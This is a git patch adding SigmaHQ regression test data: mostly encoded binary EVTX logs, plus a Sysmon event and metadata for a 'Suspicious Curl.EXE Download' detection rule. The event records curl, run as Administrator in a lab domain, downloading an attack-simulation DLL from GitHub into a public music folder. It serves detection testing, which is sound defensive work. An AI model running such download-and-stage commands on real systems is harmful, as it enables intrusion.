z0EPmF0)_&H0)_&H0)_&H0)_&H0)_&H0)_&H0wYqOzI&6uvv-To)_tt!5Fw#c;LrI& zyma-lKaB`@gaAw@?W#3P?7?Pxgt#n2h(DzX@!M3pj}WWzeJQ#jMti+HLY%K7OD+cj?7jDlD%JaFrG_gbUh;Dcez$497E;8#UlI$ zL>sNg>+c7*DOZw2mvX2z9&lPXpL z*&cWbk((=Ao@*69Ts|XJEEn5kOnBvqycA!GXhN`0s}S$ErrU_sAnM?EDQ*v0j$kf7 zoF%RXh*prS3)%0ID3ElyslwyVO%a|{SGKqiA2g@W%uE;8s9;^7R4@G8x!EE$6?N_c zyl570e>qJwA|T7ETLuyg{^1plM=8D#*SXFZU^kOZH?V(Jo0-KZ14u z0Txj^!btM47Lli}*p(Glf;tk&;}Q8Ot}Jj%NR|Xra%|LY20)@rOf1T~bF)MiaoLSX zS|B{~UbgVdV8o+aVxq~q9^nE3Rl~FXm?eCGI0(eaErZCZ1vfWc9{5waDG)GP63p-mO8R97%~JpxdwvEY{U zW=KNyfE9?GRae|;uJaJLUlge7T7Vq4p;%a=gZOU~Ti{FRn-QfDbm_x4@;ghS771t( z{cvFh3Y&$t4KXYN3o!>FJX%_BYV?S;$T8Daxt=1${T!)=FG}t zhL|BT1R6G6sc`Ym5Lq%DqRa0^c$+Hn#0orzGv`Vux~&vLT57&KMTl=enl|6OU&cy9 zRpFJ!q?>?qxF{+r1?6zKzX20$ZA9QEM6S8S--x^DhYj{1Mt=y|{E-V?tXZTv;D zR+1E?wZ*fft0mfRX&9{14GP`aZA&(|KK8kP8D9I%>2IPq844x*Dx7SSdDY!U_S2%h zPJ(U4cS_A_JlRH*3qRkN3Q5L9>3c4252a-ql50lUb)$H+#B}GNNLbL9sQBlELZ_oB z2SG7isogoih+zv14HE9>_oD`A4@N-pomcGJ1 z4J^fGiG1qL0UO1{B>-wOm*HaAos$+PP94It@grw%Jyl-r98VnjSWQzqXiBl;&Pk6G zmNJZ0lQnH8!e&@uD^)&8AC=Fk;2UDG8Fw$jcMF}LP^o3c$%&N`DMik1lu$@9R47u+ zF-5-Zsv*tn)qg0v03KiGuBpxZ|bQk@6MTGg>o$IM!?!EYgULmAY_S? zBlm^EHy|JGoLsA+(wx2^gh4)dl=Y0tibXNXDT-dJ)>-lMEY2!bIbfP92f5%Z=DP#< zX~`C9ncX>*w!rct6>~-?rUwFviV{_(0pOT#g>=MmH9~3%Tb!dCh!8!dS@bAZDappx zs$qGkVX@*{`8&(XUyRxrifgY$(-Xuu7EjHv;$qK_)Hwx~Yvk@azP|Ua? z$_tfPr^vq&?nd16a8u0B$Boe7ewV1lU4olU0GkV|iExQKAtm{Z?-lUBLWL`kN@rif$>?RQ{JBeX6b%qHgh5ub-Jc+}TFmQq;I>po94lW_?5pu|7=Q zA%yj)C2TD^@lQpz5S%~_fvFODp~R#V>Twm^Wq7N`zgJwQAlIViQChXbw-}fd$(Y45 zZWZ2&#O1PCr^4PRrJ6SkCogDar5xQpJ&tt3TR489t{7^S*zSA7aup57D>3LtJW7L5 zYvu>6RY?CT#9sr9>&3OW!|CA#^aA`?Lt2qb%4OC}uY|T;Vq(>wZuof-n-Z^0QD5`T z0O;&PY^#QMNlIIo5To^wSZu+25wlOGVufD=tbBm9678N3m@Wr)@!*gP?!D$j=drIe zlMRG^(t28fQre7Mw7}&<87)Q0RNz?)jw-_)fXj!nt;VwmyjBF9s_>&P%e4}|K70eO z;k^#;)d&+n2p>4nhv!0QD0PUr6n^yx!>@GlzZO2FiaRRhvmWnN@~)Gq@}1mGzFVlU zB+pj>9#f-F8KC(AuO2Z7B_O}mBBl>+AN-5p6Tq(=Z%mJv*CQPZ?;^zZ%l8s|uZD{u ztlSV6#;Qb!VsLqhd}q8`;M0J-t(KG{{g%q~0!WXvU=FJQtxnRc0x<%B!Z%Wmb%2xMAp|QGKM?ns``2d6u-plYmcmLRz1BiM!W&EdfG76^*lVD7kH1B!vs?9qrHzB zVb?X|>WU&#KimtwS?Py&z!^_3WCu^UKFC(g6K*xf)ePB|g+rL@1RQ_D5;1 zE2C&h%_@qsMxo6nOqp2Ph|+Kq#w=m2mpKdP8)?Tx@{NNgoG{mhwB3+4sI=pRODY5- zOk-|}!k+aYs-#AxMK6znxyT7-f|@mLl5qM;+cJ{AF|_T3^A}r#4$)j`;0;k26+7iG zVXZu2-nQfDpsAl$USri4rM)kU%B!?HBB?)mjha8uK_YxJ-l z!!&wY1pO-9NE&?+v~^48rVeIl^cQ9hcNQuQ;YVjDt|74FWB~nQTBqL*-8P<9Pwl=O zsgF*p*Lu4*qVL3uer9U5k-EDV+J=SKfJ0wavUUB~G>Prwl{z=|Z+1Jg9ioNJJ_cu9 zEn4SVg*;QwT8k&`jAm$(Ys7WX;#=@ftD~M;GxYW)%_lnFK`$3C{iNH{vS{1)z^!%n z3c#d(PHnan`eq5VRBGs@_@@R-jkpe9`Hf}kM;PkDNZp;O6H^OY!l;s|Q@^H_K>Ugk zMr-cWmP;j;RxW6(6d_hM!c@SAd7yq>4k)xg=qdpuLS+suy`41RS0~-Q7=E-Qm^aon z!mO8hq3uut7xPc(v~7HFF`xWSs{xcjX=bPKqQz3YRh_e_EIX#p%${?pweQ{`xZ?mtb0FJ%T1TZoysUDm67@_ouB zPusrG$q@9(_dUf|A-h1t)FIlRL$~k!*sI^c$l#0B-sAK9?uPG(?=%*3gb#fwCvybQ zR~N>8c%`wM>h9+=-#xUbf7)FwpZoD~fRDEAqx-;DBagJmSAojxx8|r9t#aLm&3^LL zu(bKbl2kon=)RwQ_P)BBz`h%g{ow89o&K>%Cpwi_R?-yL)TiEhs0STTq*SWNkvFMn z(Oltw0B;;`U5!wE@Z|N{{yTp`s#=}$dc4(Xq=KOJNX1mR+2v$)Ls=sg=c|#5Ymq1$ zwO%|Q6C9~PYMDsdJp`8+(kb5B``B$w&$g}l{6h~fx#gDhH&~8O%?)8DCSy7Nb@q{W zf>~BM?g0T)MY;pevZrYWYA1Vp*rxQOeU8Pgg<=MihjTt|&4d$c=w%v47H)U&FD*1_hU)69i4Ew?gWb4RQvle{Do-MY$ zxqIjX(m(2dqxbc(xv`kVjw-t^t8hW5NRFZ(i}qx2Sy*`(yBk@OZhH^HvA45)I< z|I+)<@{o9|b z`|N{HtQg!dT(v@l4TM$UQDC7x>(v_$mL=;fn8%tKOnhbdn20n3A9| zGyF7>^%nN<+WBdx;-_0L@l}p5Kj{=>@sq~P@Y9&_)7ba7NIPBg6WhH{D}Fjy@J8vu zq{$~Iy+xFC@LW`>`}ter_he+$Qz?fj&NkUGl;$C;mWiidwW@Y}$be$e#X z_vZcA)S3(aR`Zj_Y;y4vn*PYkHjeGB*}M4IlEWKb-*DjJ>Y4QjeBky~XUpf&hva)b zT4*^JK}4?ieiM_M=;O;5ufiF*&ihs*>-p%{cb5P)=XKpaAn3fF8=Z3^5I);buH$xI zzr7Tpoz`v38KViV*PaC!ao1^MvY?2$K6^SmW30>O?43C4u{l0J!aD341c|r)T4r

${gKQO}j>d~&NUJID9)>Bu>^y00fj=z4I#T$3sbTa}ZWxaF> z06VXfMk^~kA4a#a!u%3%yq59 zno_lbI^h}Vv0+-P0@MoYglF*E;f3#6z*V`J0>`znlkD=pVZn1pj`W%#lv7%|oX*vn9_&^)z5JYgty>V%+h1vzJM zMz0U%WJ|6H(CdBIOFezM_@>)h8_e~=Bdrp!*8Nsuz945KV_q`mB0o9xWalbw%!0Yd z_hbw4Xw0>Q(KCt%K~1g{=m95k7NWIEfKdDX^*&dfiuKAK#$MFgcG?MawTT9HDlIgJyv*d zB_t@hF+pA@3yX~d7zF9TK^<3bCq#E8vf^#zWN-2KW}U);sYSYL5= zr}9NvUq#2lt*>du`bz4K15J?T;kvM~zCe;RY*c91-0c>LvA#f{0^CtHy0N~j-IXG( zFD`RSh2b%At*=*<_4N|eKg&9@dRS#=NxZ zlWHt4V|j6}24i_)CWJmorV0cxmKU~9^MDYcea`4+$1m@AC$dCaUPbSOTVB(RxdGZ5Zzqn6aL1s8t^`=7mPjjCmQ$3oBlX<%PPy2{gPv%vqSxme=3?F5L2(VJt6W zc^S*geoC~lyn+eaOvdu+!5SZ)^XRNibFJ47_i*O`=NMxJ*&SyY%gb0^&b+b!d}P*n z#XiS#tSv9C`WVX#qRCiZ#_}?jSE}I7kIAvThW`+5d7W)6FJpOu+sv4k8S^@0ciEWO zV_si?<+W2;UhT7uo7S^Q8-GaLo=I zSYE6*^Wt`ILgbnqHb$6jxFBkWjX(TnxaD<@vAm4sWh^f<=5;3TZ&(wt!$uk2C(izc z2Ry@_zfqRg!i%-#wGOSi-3E!?X>OfZi)Jn$R-obIK89u|jqRYrXx2KJois?VXwI70 zJ87(f#_Pr2hima%A+EySnGJAVhnzIx%@3bO_;VM{W^oPt{BT*97Z0ZuU0TUmxz1)| zRl+^T*jSujZ}yNkHkR2-<1|-v&55$HZv5|X8*8Sqv5bucF>6M*%;?q`JGxa7VPj3K zJ>;Lr819@~fjY){g`?P&z70LA?Z&bi^{yMnvN{tjtFfLns1=))H`?r~tKqITc9pTK z%pQeirwrIsr@K=|b(CGThg)2;jKyUvE@N>Si|b6bxOg)1#66FTBUu+J zi|fd_+Tx0wEf~GucN=W1UeRgh3Wm+9jHXkpRZnI_%Zz9Vp%t7SIXl-nKb&Xa4WeH4 z;|%XuGZXEnhogPO<;CqZ7ty0ss1Cpz=`4#oA*u8k?z*4o_wLgCbZj z`{BO{A-BL?fbac?$M%C^DsX1D?hE4nK*{cJ3I^w>KCDQIYA?aqXLFCo`R^ZfIV?cw zw1Qj8ZRf~;^f(ctjo1|^bXNOEkJBbmh2AQjZg0+ycb0a0?%YpN0|{WSU-DB-3E89K z#N9{#?(Dfx;nVx6JT3dv|K z>|MSzedfWgrj~^bE`Q1mAN=L_Db|u-S1|Y{oOQQlVru(Mh~A6Hb+Q?1MJC)hVQLAU z;qwVE!k4Hsc{4CaejC#3K-*>Q67EJvp(_;-s-qyxb%KzNdH92%nVuo-&T(1so1)@# zjY|{;`JiVXaOjsZKfIk-4%l4E>CSPBJmS<41+&-*W?mea)^6}AB7^XjN5L~En1K)a z#b$8CU_`5J_R*gh`{)!bgDW2soT@;l%9xN^qE5Bjh82ypkjVETekukh6#-K9hlWJEt7ugE zsm0&zXtOy&T?jt!k-JayX4jYsIb2YKD6j8+m3JTGFPD-RUwD1DEY+o zs01y_N5v`0!lMJ_QZPb$9jgdHX_*Oo!Xs8zTnU7&SO@N zp0bPlkm9UMocq)c=3p0_=ZalCkSTPOsWzgp0{}bo`vJz< z=f<52JD2864`4p>UN-bDdNaLlnW8?MuMz%%tUqR<`>qX$P+U_5+o|B>ri(mJ`3w25 z33W{38Y6Iy$V)+*YXNirJ{qDsBx2@7iZR<46{WZ-ybq(XJG>7gc;@wCfL&Y^jILmi zGrvtAhCs)qL%)dW!wB{Mc&y%^UKqRKeOe%#)uZ&tta_^#k6%t*=LqrC*#ezNLU?Ps z4j(N)?0bE~DPQGy;Fau|GV;hhf2+|?MeWv_!`cNMjd4OfcLV4xT&-m8CMkn^#L#^| z`|N#nHGzFM9{a)D%{%>x^bn4ePIM}<`VptNZkw_(5PT41LUuF640MX}5YlvL{T$^^ zm$xQKnsPYX?XfI>9ozPt=@w%Cd?8ljd5!wM=f%%_V-EUXrB>t`-q>3(557)&NaM3a zHACb}ohtI&)bj;ShQP%QRXO}czIaTqzgLL9Oz?qwh~7gw#o(KH4VarOUePQ9zPR?n z5N5(UK5co{yO`}JNJGIv_hWuC|-!pYoTn{ z?PGO?F}c4`?1IHo1#7YhIzzp5bC;!3xJywp%HS@6%~~MC_#yTR;8TXDU(})>q7ps5 z<#1Kw{bpcgyU0i6rvoUEb?W=O1$Tbgn>2o!qxfk)NF$~WkxD~4#Xo${d%SApcWdtW z$LFT+E`bmD=_I<%HD;5NpQb+b)L#H{kua^YI_^?wh||I~#^ zD@P}}pi}Jln)mpR*01pGyJh8ymu|Pp@d!qTG-i{s9M4#}aGm0(dFSl=;?kt?lapM~ zDLS-z#=$=Rq~fPTC0~9fdHm$02kR97p~HLp_IKW@-}lBt*XOLX_=$S3#%xmZ z)2Q`e-BDTk!J;*Rag_@?MW=S=C2UZwF`Ja-m>fNL9OS~Mlw8=q_l+d-lapM~DgN+P z@9~FQ->u#I?8i61!+}lJZ>BMul>9VmxzMW0F=g?dZR0B!bc+8R@OC}0=*_@AFZ}kI zqYM9ih~+qCy1+n)x=eq%HMa8M`_nl$i@oA?&^!ImB`pn;7Bc(OIctjF0`RMau33O^ zoNLG!^sAK5GWf>PKR2pE`}X|rztk|U?Tk**sh#9KoL*`6ahs*5l{pa0YyL&Pz273KzwwlYk2&SxY>Qa|C5viQsCEDi5zWO z_Uc&$pCy1v=gAfCrw3ae7P+lL*wvW#Q7o84Q1qKBaZ*;ktEk;q%r2nV%#5l`#lJofXvr3%NM`H5uK8zQ|3&<7f!aVo76v{a7;kW~xxaDd^nV#jwWOXAscZ#f%9wS7_N=uKPpZ5wqmbII`EsEO@7LE6b#JFe2lts z^)}HPmR)iJlBZ3IQ1IBy%zos{)#yi$R>%&M`cb4ch)|Qbx(-{yDdYC%LvkN7JBEuQ zH8m0l@ALHG_N5`&B1cS2T&k7YvRIk)AlM^bh)?<#q=B_fHsji@*uqpfin;x-Rq_Bt z^aHXH6o15IfzZ{2Bpj?MlW-_dEjQtW)AVa97swtj*a(ms$F*QhwS+=wb2s9^srcaA z< zTyDXEYdH^}u8{4xd;;}00UQT`JA;&Gh$P-9R9 zX3n;iV0qwr#GRA|uemm$#0O9j1{s}Dx?lq z(EzZ=twO3yI7Bz+n{c#9YGo__e^a%>NO66ooOD+6!-XP0sufu^@wkaqj;6v-Ig{=| zp8ck*LH6R@I1rftI#a;NnxioskIO?Hhxgv`+rM|c*&Y65ua<1{$npR0Dh_%&O z;%ZI%m$yxKxDJK;)d$u;6u9@P-+jLOCrjQ#butuc_+9L>Pv&RySE+u^v~M>4Mu`e%Q&}tajs9v&u%7z5{#5d1;elK!n5|h+?PY8*ey{{ zgAu4v-n=A$HcRO@!@)>-fjFBHo}C{x`|xai1tZ}C_}H##5SY^J1S1OygryB*(_~9K zfv^=eY`a%Z;^UQb5%h++IEZZ=;YY=lCsk{e1xjL5B2v`sZX<<=p+OO`oGEshHcbo5 zQNw1$;XX@61I_$a+t{pg>KR+Bm*3EAlMhA~+E6)byBo3&nwFK)4j5VHDW~?O!f!)4 zf{_~AQ8`UtoytKSbd>FkgB6Py?G#O~ZFM$&t<|g+uLMlfD?tr3i{(xtf6lU{dgfq+ z))u+E*^9X}6*CNj#DNlrOjF2Xoeh~Yk2?_3A#63rbr2~$uCjQvc`2FB*0!)(w6J{f zZTS}4^5torskrH_Xi1Uz&8JgKZG6@RwPJY+nJQm?U8fL?T#XnZp_vK7ls9^2ohH8n z`_La*apK~fo|0MZASVnh!>U3cYg1|ZKux+uWCZZ%!D~VR%gQJYeipaiN@yHIU~9?Ni>c-Cb*h7A7(1P957k zx#N1oZ9tEoErHf%8gh>yPpKh3^_AlV+7fEe3G7cmK06oMGxn$rMym($&lbdy_*$Il zM~})0K^y9I0KW%-RjWb%0RH=ddQv*EMe$vSk##Hf+webxYt82R5K`_$+yQgk30W*z zddi$$^x|q18&PkR*gjZYjzY#EcLJs4 z@SNd$@r^+jx1;Zlq2JzuAwVHH)Z}OPd^Y^ScXm>h#r<;zxD~lS2po1{F9xhOnBPrE zxgGemVvC#hkTA8u6 zc_Od|eMApz8j&M@8%$j0j^ScRnVQ~ZwkE`H$3BrrAV0*Y)s(6U`|BWk9nQ0+KCC@6 zd>bc)usJVXb1pV#3>xAr&P_ZtA>fEn>)x`pk>&emh+;+Mt5m5CZVHj z$%nAtfb%2}7?NRZ+p~6QHNrHby;2(<^GY$F_TukX=bEP>)Z!rOE;^eh|2!dAFR&do zyA$m*ju98NyAieDjqhrduN7qijQZZyOHy^bMR}wjRsNDS1287PVJDJ&3k$ls2kWr9lx*7rU@=K^9$-^tL zZVT{9WTwu-Bi(}_h4>>=%(L@G2Gg=4`66;Og?OTFTu+>ZA39fFXg6f$EgKeGb9$s_*P3mCuCj+e{og-5^B0(zp(QND<*Y}E{2b2BI1~0;n1XB$=bwHF zD{@K5%kcDM#pjGPD+hJxwI(nso-}>Czwg}wR)7@XECaMHOJ;K}nY9IE+IgFo&8lODQ0ysY5_}WUt%#m|@T6aHUhLOp{yxJ!%eJ1U3OGP8si#$wXG|u@$KIFod z4JaD9{4#A>7o1~R)8(a?)#I+>S(uS~$kLJs<}8+B=KRp|?QYZtZujCd!{7C0I9q3PW~GyDBVSOD*^p&yIp^&`?L1>zW(uVL3 zr)v*nrv^~(`A|-GO|X(;7|-lMJKuq^gPr3$S>zwdADu60?ZBH{*!jsDIXCiZ=SLdL zN>1+lNF(z@eJ@^GI@6MEby=ewsP7b?l-ZWE>$R{%@}lIPQ+af~{ahH`^U<%ahIWtx z9Z0hgmp)IH<07l;>hjX(N!dkmmBoyIN{L-`(|h?B26c{I`~&u1!=~(_^>R~o5!Nr$ zJ5AX|dYLJ^SipPiwJdh=jc@wd#huD7D!Z7)B`Ld@m$6iK(fOa3!{xcO*u_67yQu6U z*bn>Y2K^H*47*4!rF2-LR?LoD!SuM9XeI}6arwMK@CRgGQR=UH-Lr(CD=Mdb4VbGxs}dujCNQ?B!D-ks`6 zImsLI_|#*|MX9a=2<`2 zxl6fD2C*NBq#q`Wu7laf!6UU{CB?_Yan_)DIjC!gxi{mfUk|I;z! zCo+ba^fB}7;bC|}9mU*-zEDZ{2x63lp=NGr#rY1X@8reh6Ayr;Qs2qkUasmpnco9g z`9$RtQ%|X?@1(mQbLssQl}{}0Y4IzMPrMKJWBC;RZv1b>%0D~dTiy$gO~2nJW@z}- zW6Q-Mx=H->J82x^&$0i4a)`eJYK`dgpIp5tnJFJy6uYoGITh`q`oDu;-!$9Y^~cO}j${t`teJ9%^LhSSJtXrpQ|cj^9~4hkf|eW6R|i>8A11e@tT$ zxrXE^Wf7G{R2ETL#CfoYr?ObY*th&F;vQuYl|@9?UH#a+>NHc{#s%+i{xi&D&Szv)=TK+~|2m-nCLaBQNwDaP(s^@|vWUteDvPKrqOypW1B;lxJ~w7%_|#*|o!ZJ9 z;^{u+4P^%w$DdH%P?mxxtfM`V5caqg;tik9@`W6J(a#(1Q{GT{LuixV^G$sr)fdvQ z5to%Or1FO93wa3aO)FMwKZ;-Vg`9*v*M*FI-_K(1R~A!QOl2|C zdmLRCa%N+eMwB#*c~8c=kkKo0UC32$o*6#bh?>E=kb^fB@BKK575on4PUtv(kC>Gq zDs!mJVd*f3F^sNyvHoM1Y{%MjltI@XOj^!Zw-vLNG*ObmZM&Z20J&M8RyxBXN zoI}nEr?cFXT+G9KoL*`6ahs*5l{pa0YyL&Py`eKML-cy1QY>9KoL*`6ahs*5l{pa0YyL& TPy`eKML-cy1QdZQ5P|;#8%UvH literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json new file mode 100644 index 000000000..aebb8f310 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:23:21.381915Z" + } + }, + "EventRecordID": 8613670, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:23:21.362", + "ProcessGuid": "5AA13A44-CF49-68FC-2630-000000004002", + "ProcessId": 9032, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml new file mode 100644 index 000000000..66f1312ef --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml @@ -0,0 +1,13 @@ +id: e2254736-78df-48bf-acd9-e36f914e21bc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + title: Suspicious Curl.EXE Download +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx new file mode 100644 index 0000000000000000000000000000000000000000..68165e60f22ec9ef4996431b535fa16f3f65b657 GIT binary patch literal 69632 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 